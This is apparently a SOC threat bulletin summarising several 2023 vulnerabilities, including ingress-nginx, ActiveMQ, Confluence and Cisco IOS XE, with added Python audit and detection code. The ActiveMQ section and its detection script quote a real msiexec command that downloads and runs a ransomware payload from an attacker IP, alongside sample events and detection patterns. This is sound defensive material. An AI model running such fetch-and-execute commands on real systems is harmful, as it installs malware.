In our Threat Bulletins, our highly skilled Security Operations Center (SOC) team has meticulously analyzed and summarized the top threats that have been monitored over the past several weeks. Stay one step ahead of the adversaries as we delve into the ever-evolving landscape of cyber threats, uncover their tactics, and equip you with the knowledge to fortify your defenses against them.
Sources:
- https://thehackernews.com/2023/10/urgent-new-security-flaws-discovered-in.html
- https://www.armosec.io/blog/cve-2023-5043-nginx-ingress/
- https://github.com/kubernetes/ingress-nginx/issues/10571
- https://github.com/kubernetes/ingress-nginx/issues/10572
- https://github.com/kubernetes/ingress-nginx/issues/10570
Entities:
- NGINX
- Kubernetes
- ARMO (Kubernetes security platform)
Indicators of Compromise:
- CVE-2022-4886
- CVE-2023-5043
- CVE-2023-5044
Attack Vectors:
- Attackers can exploit vulnerabilities in the NGINX Ingress controller for Kubernetes to steal secret credentials from the cluster. These vulnerabilities allow for path sanitization bypass, arbitrary command execution, and code injection.
Impact:
- Successful exploitation of these flaws could result in unauthorized access to sensitive data and the injection of arbitrary code into the ingress controller process.
Detailed Description:
- The security flaws in the NGINX Ingress controller for Kubernetes can allow attackers to bypass path sanitization, inject arbitrary commands, and execute code.
- CVE-2022-4886 specifically results from a lack of validation in a field within the Ingress object, enabling attackers to access Kubernetes API credentials.
- CVE-2023-5043 and CVE-2023-5044 vulnerabilities enable an attacker who can control the configuration of the Ingress object to steal secret credentials from the cluster. In default configuration, these secrets include credentials for the Kubernetes API server with very high privileges.
- The attacker can use either the annotation field “configuration-snippet” (CVE-2023-5043) or “permanent-redirect” (CVE-2023-5044) to inject arbitrary code into the ingress controller process and gain access to everything that process can reach. Among these is the service account token of the ingress controller, which is bound to a ClusterRole that permits reading every Kubernetes secret in the cluster.
Recommendations:
- To mitigate the risks associated with these vulnerabilities, apply the provided mitigations and updates: enable “strict-validate-path-type” and set the “--enable-annotation-validation” flag.
- Additionally, updating NGINX to version 1.19 and adding the “--enable-annotation-validation” command-line option resolves CVE-2023-5043 and CVE-2023-5044.
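As an added illustration of the two settings named in these recommendations (example code written for this bulletin, not code from ARMO or the ingress-nginx project), the following Python audit checks exported cluster objects for the --enable-annotation-validation controller flag, the strict-validate-path-type ConfigMap key, and Ingress objects carrying the configuration-snippet or permanent-redirect annotations. The Deployment, ConfigMap and Ingress dicts in the block are constructed samples shaped like "kubectl get ... -o json" output, and all helper names are the example's own.

```python
"""Audit an ingress-nginx install for the mitigations recommended above.

Added example, not code from the bulletin, ARMO or the ingress-nginx project.
Assumes the controller Deployment, its ConfigMap and the Ingress objects were
exported with `kubectl get ... -o json` and loaded as dicts; the objects below
are constructed sample data.
"""

CONTROLLER_FLAG = "--enable-annotation-validation"   # controller CLI flag
STRICT_PATH_KEY = "strict-validate-path-type"         # controller ConfigMap key
RISKY_ANNOTATIONS = (
    "nginx.ingress.kubernetes.io/configuration-snippet",   # CVE-2023-5043
    "nginx.ingress.kubernetes.io/permanent-redirect",      # CVE-2023-5044
)

def controller_args(deployment):
    """All args of all containers in the controller Deployment."""
    args = []
    for container in deployment["spec"]["template"]["spec"]["containers"]:
        args.extend(container.get("args", []))
    return args

def annotation_validation_enabled(deployment):
    """Accept '--flag' or '--flag=true'; '--flag=false' counts as disabled."""
    return any(a in (CONTROLLER_FLAG, CONTROLLER_FLAG + "=true")
               for a in controller_args(deployment))

def strict_path_validation_enabled(configmap):
    """The ConfigMap value is a string, so compare case-insensitively."""
    return configmap.get("data", {}).get(STRICT_PATH_KEY, "").lower() == "true"

def risky_ingresses(ingresses):
    """(namespace/name, annotation) for every Ingress using a risky annotation."""
    hits = []
    for ing in ingresses:
        meta = ing["metadata"]
        for key in meta.get("annotations", {}):
            if key in RISKY_ANNOTATIONS:
                hits.append((meta["namespace"] + "/" + meta["name"], key))
    return hits

def audit(deployment, configmap, ingresses):
    """Human-readable findings; an empty list means every check passed."""
    findings = []
    if not annotation_validation_enabled(deployment):
        findings.append("controller is started without " + CONTROLLER_FLAG)
    if not strict_path_validation_enabled(configmap):
        findings.append("ConfigMap key " + STRICT_PATH_KEY + " is not \"true\"")
    for name, key in risky_ingresses(ingresses):
        findings.append(name + " uses " + key)
    return findings

def make_deployment(*extra_args):
    """Constructed: minimal shape of the ingress-nginx controller Deployment."""
    return {"spec": {"template": {"spec": {"containers": [{
        "name": "controller",
        "args": ["/nginx-ingress-controller",
                 "--configmap=$(POD_NAMESPACE)/ingress-nginx-controller",
                 *extra_args]}]}}}}

WEAK_DEPLOYMENT = make_deployment()
HARDENED_DEPLOYMENT = make_deployment(CONTROLLER_FLAG)
WEAK_CONFIGMAP = {"data": {}}
HARDENED_CONFIGMAP = {"data": {STRICT_PATH_KEY: "true"}}
SAMPLE_INGRESSES = [  # constructed sample Ingress objects
    {"metadata": {"namespace": "shop", "name": "web", "annotations": {
        "nginx.ingress.kubernetes.io/configuration-snippet": "proxy_buffering off;"}}},
    {"metadata": {"namespace": "shop", "name": "api", "annotations": {
        "nginx.ingress.kubernetes.io/rewrite-target": "/"}}},
]

if __name__ == "__main__":
    for finding in audit(WEAK_DEPLOYMENT, WEAK_CONFIGMAP, SAMPLE_INGRESSES):
        print("FINDING:", finding)
    print("hardened:", audit(HARDENED_DEPLOYMENT, HARDENED_CONFIGMAP, []))
```

Run directly it prints three findings for the weak setup and an empty list for the hardened one. The Ingress check is the part worth keeping after patching: the flag and the ConfigMap key are one-time settings, while Ingress objects carrying the two annotations are written by application teams and keep reappearing.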
Sources:
- https://www.bleepingcomputer.com/news/security/exploit-released-for-critical-cisco-ios-xe-flaw-many-hosts-still-hacked/
- https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/
Entities:
- Cisco IOS XE
Indicators of Compromise:
- CVE-2023-20198
Attack Vectors:
- Remote code execution through Web Services Management Agent (WSMA)
Impact:
- Thousands of Cisco IOS XE devices compromised, unauthorized access, reconnaissance
Detailed Description:
- CVE-2023-20198 is a critical flaw that allows an attacker to create a full-privilege user on Cisco IOS XE devices.
- The exploit takes advantage of weaknesses in the Web Services Management Agent (WSMA) and Nginx-based server configurations.
- Cisco has released patches for the most affected versions, with version 17.3 remaining unpatched.
Recommendations:
- Apply the provided security patches for affected Cisco IOS XE versions.
Sources:
- https://www.bleepingcomputer.com/news/security/3-000-apache-activemq-servers-vulnerable-to-rce-attacks-exposed-online/
- https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/
Entities:
- Rapid7
- Apache ActiveMQ
- HelloKitty Ransomware
Attack Vectors:
- Remote code execution via Apache ActiveMQ vulnerability
Impact:
- Ransomware deployment
- Potential data loss
- System compromise
Detailed Description:
- Rapid7 detected two separate instances of Apache ActiveMQ CVE-2023-46604 exploitation.
- The adversary attempted to deploy ransomware binaries on target systems in an effort to ransom the victim organizations.
- CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ that allows a remote attacker with network access to a broker “to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause the broker to instantiate any class on the classpath.”
- The ransomware encrypts files and communicates with an HTTP server, 172.245.16.125, through a provided email address, [email protected].
- During successful exploitation of the vulnerability, the java.exe process path will contain the specific Apache application being targeted — in this case, D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64; this java.exe was observed as the parent process in both incidents.
- Post-exploitation, the adversary attempted to load remote binaries named M2.png and M4.png using MSIExec.
Indicators of Compromise:
- http://172[.]245[.]16[.]125/m2.png
- http://172[.]245[.]16[.]125/m4.png
- Files dropped and executed via the msiexec command:
- cmd.exe /c “start msiexec /q /i hxxp://172[.]245[.]16[.]125/m4.png”
- The following file hashes were part of the two MSI packages downloaded from the host 172[.]245[.]16[.]125:
- M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
- M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
- dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7
- EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C
Affected Products:
- According to Apache’s advisory, CVE-2023-46604 affects the following:
- Apache ActiveMQ 5.18.0 before 5.18.3
- Apache ActiveMQ 5.17.0 before 5.17.6
- Apache ActiveMQ 5.16.0 before 5.16.7
- Apache ActiveMQ before 5.15.16
- Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
- Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
- Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
- Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16
Recommendations:
- Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 which fixes this issue.
SOC Response:
- The SOC is building a detection around the known indicators of compromise at this time and will monitor for any updates around this exploit.
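Added example (not code from the bulletin, Rapid7 or Apache): a Python helper that applies the indicators listed above and the affected-version list from Apache's advisory. It refangs the C2 host and the hashes so they can be matched, flags msiexec URL installs spawned under the ActiveMQ java.exe, and tests a broker version against the advisory's ranges. SAMPLE_EVENTS is constructed process telemetry in a simple key=value format, not real log data, and the 203.0.113.9 address is a documentation-range placeholder.

```python
"""IOC matching and affected-version check for Apache ActiveMQ CVE-2023-46604.

Added example, not code from the bulletin, Rapid7 or Apache. The IOC host,
hashes and the msiexec/java.exe parent-child pattern are the ones the bulletin
lists (refanged here so they can be matched); the affected-version ranges are
the ones from Apache's advisory quoted above. SAMPLE_EVENTS is constructed
process-creation data, not real telemetry.
"""
import re

IOC_HOST = "172.245.16.125"          # listed defanged above as 172[.]245[.]16[.]125
IOC_HASHES = {                        # SHA-256 from the bulletin, lowercased
    "8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4": "M2.msi",
    "8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0": "M4.msi",
    "c3c0cf25d682e981c7ce1cc0a00fa2b8b46cce2fa49abe38bb412da21da99cb7": "dllloader",
}
# msiexec told to install a package straight from a URL (the "/i hxxp://..." pattern)
MSIEXEC_URL = re.compile(r'msiexec(?:\.exe)?[^"]*?/i\s+(https?://[^\s"\']+)', re.I)

def parse_event(line):
    """Parse one constructed 'Key=Value|Key=Value' event line into a dict."""
    return dict(field.split("=", 1) for field in line.strip().split("|"))

def classify(event):
    """Return the rules an event triggers (empty list = nothing suspicious)."""
    reasons = []
    parent = event.get("ParentImage", "").lower()
    digest = event.get("Hash", "").lower()
    match = MSIEXEC_URL.search(event.get("CommandLine", ""))
    if match:
        if IOC_HOST in match.group(1):
            reasons.append("msiexec install from bulletin C2 host " + IOC_HOST)
        # Behavioural rule: the broker's java.exe should never be the parent
        # of a URL-based msiexec install, whatever host the package comes from.
        if parent.endswith("java.exe") and "activemq" in parent:
            reasons.append("URL-based msiexec install spawned under ActiveMQ java.exe")
    if digest in IOC_HASHES:
        reasons.append("known hash: " + IOC_HASHES[digest])
    return reasons

def scan(lines):
    """(line_index, reasons) for every event that triggers at least one rule."""
    hits = []
    for index, line in enumerate(lines):
        reasons = classify(parse_event(line))
        if reasons:
            hits.append((index, reasons))
    return hits

# Affected ranges from Apache's advisory: (first affected, first fixed).
AFFECTED_RANGES = [
    ((5, 18, 0), (5, 18, 3)),
    ((5, 17, 0), (5, 17, 6)),
    ((5, 16, 0), (5, 16, 7)),
    ((0, 0, 0), (5, 15, 16)),   # "Apache ActiveMQ before 5.15.16"
]

def parse_version(text):
    """'5.15.3' -> (5, 15, 3); missing components are padded with zeros."""
    parts = [int(p) for p in re.findall(r"\d+", text)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))

def is_affected(version):
    """True if an ActiveMQ broker or client version falls in an affected range."""
    v = parse_version(version)
    return any(low <= v < fixed for low, fixed in AFFECTED_RANGES)

SAMPLE_EVENTS = [  # constructed sample telemetry
    r'ParentImage=D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64\java.exe|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c "start msiexec /q /i http://172.245.16.125/m4.png"|Hash=',
    r'ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\msiexec.exe|CommandLine=msiexec /i C:\Users\ops\Downloads\agent.msi|Hash=',
    r'ParentImage=C:\Windows\System32\msiexec.exe|Image=C:\Windows\Temp\M2.msi|CommandLine=|Hash=8177455AB89CC96F0C26BC42907DA1A4F0B21FDC96A0CC96650843FD616551F4',
    r'ParentImage=D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64\java.exe|Image=C:\Windows\System32\cmd.exe|CommandLine=cmd.exe /c "start msiexec /q /i http://203.0.113.9/update.png"|Hash=',
]

if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_EVENTS):
        print(index, "; ".join(reasons))
    print("5.15.3 affected:", is_affected("5.15.3"))
```

Run directly it reports events 0, 2 and 3 and confirms that the 5.15.3 install seen in the incidents is in the affected range. The behavioural rule (any URL-based msiexec install whose parent is the ActiveMQ java.exe) is the durable part of the detection: the host and the package hashes change between campaigns, while a broker spawning installers does not become legitimate.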
Sources:
Entities:
- Vulnerable Windows Driver Model (WDM)
- Windows Driver Frameworks (WDF) drivers
Attack Vectors:
- Vulnerable Windows drivers
Impact:
- Non-privileged threat actors could exploit these drivers to gain control of devices and execute arbitrary code on the underlying systems. This can lead to firmware alteration, privilege escalation, and potentially render systems unbootable. Furthermore, these vulnerabilities can be weaponized for BYOVD (Bring Your Own Vulnerable Driver) attacks.
Detailed Description:
- Researchers have identified 34 unique vulnerable Windows drivers in the Windows Driver Model and Windows Driver Frameworks.
- Exploiting these drivers could allow threat actors to gain control of devices, execute arbitrary code, and, in some cases, alter firmware or elevate operating system privileges.
- The names of some of the vulnerable drivers include AODDriver.sys, ComputerZ.sys, dellbios.sys, GEDevDrv.sys, GtcKmdfBs.sys, IoAccess.sys, kerneld.amd64, ngiodriver.sys, nvoclock.sys, PDFWKRNL.sys (CVE-2023-20598), RadHwMgr.sys, rtif.sys, rtport.sys, stdcdrv64.sys, and TdkLib64.sys (CVE-2023-35841). Additionally, some drivers can bypass security mechanisms like KASLR and can be used for BYOVD attacks, which have been employed by threat actors like the Lazarus Group.
Recommendations:
- Ensure that the systems are kept up to date with the latest driver updates and patches. Employ security measures to prevent unauthorized driver installations.
Sources:
Entities:
- Veeam ONE IT monitoring and analytics platform
Attack Vectors:
- Vulnerabilities in Veeam ONE IT monitoring and analytics platform
Impact:
- Critical vulnerabilities have been identified in Veeam ONE IT monitoring software, with potential risks ranging from remote code execution on SQL servers to obtaining sensitive account information and cross-site scripting attacks.
Detailed Description:
- Veeam ONE IT monitoring software has been found to have four critical vulnerabilities, including flaws that could lead to remote code execution on SQL servers, exposure of sensitive account information, and cross-site scripting attacks.
- The list of vulnerabilities is as follows:
- CVE-2023-38547 (CVSS score: 9.9) – An unspecified flaw that can be leveraged by an unauthenticated user to gain information about the SQL server connection Veeam ONE uses to access its configuration database, resulting in remote code execution on the SQL server.
- CVE-2023-38548 (CVSS score: 9.8) – A flaw in Veeam ONE that allows an unprivileged user with access to the Veeam ONE Web Client to obtain the NTLM hash of the account used by the Veeam ONE Reporting Service.
- CVE-2023-38549 (CVSS score: 4.5) – A cross-site scripting (XSS) vulnerability that allows a user with the Veeam ONE Power User role to obtain the access token of a user with the Veeam ONE Administrator role.
- CVE-2023-41723 (CVSS score: 4.3) – A vulnerability in Veeam ONE that permits a user with the Veeam ONE Read-Only User role to view the Dashboard Schedule.
- These vulnerabilities can have serious implications for organizations using Veeam ONE for their IT monitoring needs.
- To mitigate these risks, Veeam has released security updates for affected versions.
Recommendations:
- Users of affected Veeam ONE versions are strongly advised to apply the security updates provided by Veeam. Additionally, it is recommended to stop the Veeam ONE Monitoring and Reporting services, replace existing files with the files provided in the hotfix, and then restart the two services.
Sources:
- https://thehackernews.com/2023/11/cisa-alerts-high-severity-slp.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-29552
Entities:
- Service Location Protocol (SLP)
- CVE-2023-29552
Attack Vectors:
- Denial-of-Service (DoS) vulnerability in SLP protocol
Impact:
- A high-severity flaw in the Service Location Protocol (SLP) is actively exploited, posing a risk of significant denial-of-service (DoS) amplification attacks. Tracked as CVE-2023-29552, the vulnerability allows unauthenticated remote attackers to register services and conduct DoS attacks with a substantial amplification factor.
Detailed Description:
- CISA has issued an alert regarding the active exploitation of a high-severity flaw in the Service Location Protocol (SLP).
- Tracked as CVE-2023-29552, the vulnerability allows unauthenticated remote attackers to register services and launch denial-of-service (DoS) attacks with a considerable amplification factor.
- While specific details of the exploitation are unknown, the potential impact on targeted networks and servers is significant.
Recommendations:
- Disable the SLP service on systems running on untrusted networks.
Sources:
Entities:
- ScreenConnect
- Transaction Data Systems (TDS)
- Healthcare Organizations
Attack Vectors:
- Compromised ScreenConnect instances
Impact:
- Unauthorized access
- Installation of malicious payloads
- Network reconnaissance
Detailed Description:
- Huntress has identified a series of cyberattacks targeting healthcare organizations in the U.S., exploiting vulnerabilities in ScreenConnect instances used by TDS.
- The attackers employ similar tactics across multiple incidents, involving the installation of malicious payloads and additional remote access tools for persistent access.
- The compromised endpoints, operating on Windows Server 2019, are associated with the pharmaceutical and healthcare sectors.
- The ScreenConnect instance is linked to the ‘rs[.]tdsclinical[.]com’ domain.
- The exact breach mechanism, whether through compromised credentials or another method, remains unclear.
Recommendations:
- Immediately investigate and secure ScreenConnect instances associated with the ‘rs[.]tdsclinical[.]com’ domain.
Sources:
- https://thehackernews.com/2023/11/alert-effluence-backdoor-persists.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-22515
- https://nvd.nist.gov/vuln/detail/CVE-2023-22518
Entities:
- Atlassian Confluence Servers
- Effluence Backdoor
Attack Vectors:
- Exploitation of critical vulnerabilities (CVE-2023-22515 and CVE-2023-22518) in Atlassian Confluence Servers leading to the deployment of the Effluence backdoor. The vulnerabilities entail:
- CVE-2023-22515 – A critical bug in Atlassian that could be abused to create unauthorized Confluence administrator accounts and access Confluence servers.
- CVE-2023-22518 – A flaw an attacker can also take advantage of to set up a rogue administrator account, resulting in a complete loss of confidentiality, integrity, and availability.
Impact:
- Deployment of Effluence, a persistent backdoor following the successful exploitation of critical vulnerabilities in Atlassian Confluence Servers.
- The backdoor allows remote access without authentication, enabling lateral movement within the network, data exfiltration, and various malicious actions on the compromised server.
Detailed Description:
- A persistent backdoor named Effluence is discovered following the exploitation of critical vulnerabilities (CVE-2023-22515 and CVE-2023-22518) in Atlassian Confluence Servers.
- Despite patching, Effluence remains active, allowing unauthorized remote access and various malicious activities.
- The attack involves embedding a web shell that provides access to every web page on the server.
- The adversary gains initial access through CVE-2023-22515, embedding a web shell that grants access to all web pages.
Recommendations:
- Organizations using Atlassian Confluence Servers should urgently apply patches for CVE-2023-22515 and CVE-2023-22518 to mitigate the risk of exploitation.
SOC Response:
- The SOC is building a detection around known indicators of compromise at this time and will continue to monitor for any updates around this exploit.
Sources:
- https://thehackernews.com/2023/11/alert-microsoft-releases-patch-updates.html
- https://www.bleepingcomputer.com/news/microsoft/microsoft-november-2023-patch-tuesday-fixes-5-zero-days-58-flaws/
- https://msrc.microsoft.com/update-guide/releaseNote/2023-Nov
Entities:
- Microsoft
- CVE-2023-36025
- CVE-2023-36033
- CVE-2023-36036
- CVE-2023-36038
- CVE-2023-36413
Attack Vectors:
- Exploitation of zero-day vulnerabilities
- Windows SmartScreen
- Elevation of Privilege
- Denial of Service
- Security Feature Bypass
- Information Disclosure
Impact:
- Elevation of privilege
- Bypassing security features
- Potential remote code execution
Detailed Description:
- Microsoft’s November updates cover 63 security flaws, including 5 zero-days actively exploited.
- The five zero-days of note are as follows:
- CVE-2023-36025 (CVSS score: 8.8) – Windows SmartScreen Security Feature Bypass Vulnerability
- CVE-2023-36033 (CVSS score: 7.8) – Windows DWM Core Library Elevation of Privilege Vulnerability
- CVE-2023-36036 (CVSS score: 7.8) – Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
- CVE-2023-36038 (CVSS score: 8.2) – ASP.NET Core Denial of Service Vulnerability
- CVE-2023-36413 (CVSS score: 6.5) – Microsoft Office Security Feature Bypass Vulnerability
Recommendations:
- Apply Microsoft’s November updates promptly.
Sources:
- https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-exploited-juniper-pre-auth-rce-exploit-chain/
- https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US
Entities:
- CISA
- Juniper
Attack Vectors:
- Remote Code Execution (RCE) via Juniper’s J-Web interface.
Impact:
- Significant risks to federal enterprises; actively exploited vulnerabilities.
Detailed Description:
- The vulnerabilities (CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, CVE-2023-36847) in Juniper’s J-Web interface are part of a pre-auth exploit chain, allowing remote code execution.
- Successful exploitation has been observed in the wild.
- Administrators are advised to upgrade Junos OS immediately or restrict internet access to the J-Web interface.
- CISA emphasizes urgency, adding the vulnerabilities to its Known Exploited Vulnerabilities Catalog.
Recommendations:
- Organizations are strongly encouraged to prioritize patching.
Sources:
Entities:
- Routers
- NVRs
- Mirai-based Botnet
- Akamai
- JenX Mirai
- InfectedSlurs
- HailBot
- wso-ng
- AWS
- Redis database
- Microsoft
Attack Vectors:
- Two zero-day vulnerabilities with remote code execution (RCE) functionality targeting routers and network video recorder (NVR) devices. Exploitation of default admin credentials, installation of Mirai variants.
Impact:
- Massive, distributed denial-of-service (DDoS) attacks, potential compromise of sensitive data, lateral movement within affected organizations, and persistent threat presence.
Detailed Description:
- The malware campaign exploits two zero-day vulnerabilities, targeting routers and NVRs using default admin credentials to install Mirai variants.
- The botnet, InfectedSlurs, employs racial and offensive language in its command-and-control servers.
- Akamai discovered the campaign in late October 2023, with fixes for one vulnerability expected to be released next month.
- The attackers’ identity remains unknown.
Recommendations:
- Apply patches promptly upon release by vendors to mitigate the vulnerabilities.
- Change default admin credentials on routers and NVR devices.
- Implement network segmentation to limit lateral movement.
Sources:
- https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-exploited-windows-sophos-and-oracle-bugs/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
Entities:
- U.S. Cybersecurity & Infrastructure Security Agency (CISA)
- Microsoft Windows
- Sophos Web Appliance
- Oracle Fusion Middleware
Indicators of Compromise:
- CVE-2023-36584
- CVE-2023-1671
- CVE-2020-2551
Attack Vectors:
- Exploiting applications vulnerable to CVE-2023-36584, CVE-2023-1671 and CVE-2020-2551
Impact:
- Remote Code Execution
- Compromise of WebLogic Server
- Security Feature Bypass
Detailed Description:
- CISA has added three actively exploited vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog, emphasizing the need for immediate attention and mitigation.
- The three vulnerabilities are:
- CVE-2023-36584 – “Mark of the Web” (MotW) security feature bypass on Microsoft Windows.
- CVE-2023-1671 – Command injection vulnerability in Sophos Web Appliance allowing remote code execution (RCE).
- CVE-2020-2551 – Unspecified vulnerability in Oracle Fusion Middleware, allowing an unauthenticated attacker with network access via IIOP to compromise the WebLogic server.
- Microsoft addressed CVE-2023-36584 in the October 2023 Patch Tuesday.
- Sophos Web Appliance, affected by CVE-2023-1671, reached end-of-life on July 20, and users are advised to migrate to Sophos Firewall for ongoing security.
Recommendations:
- Apply relevant security updates to address the identified vulnerabilities.
- Sophos Web Appliance users must migrate to Sophos Firewall for ongoing security support.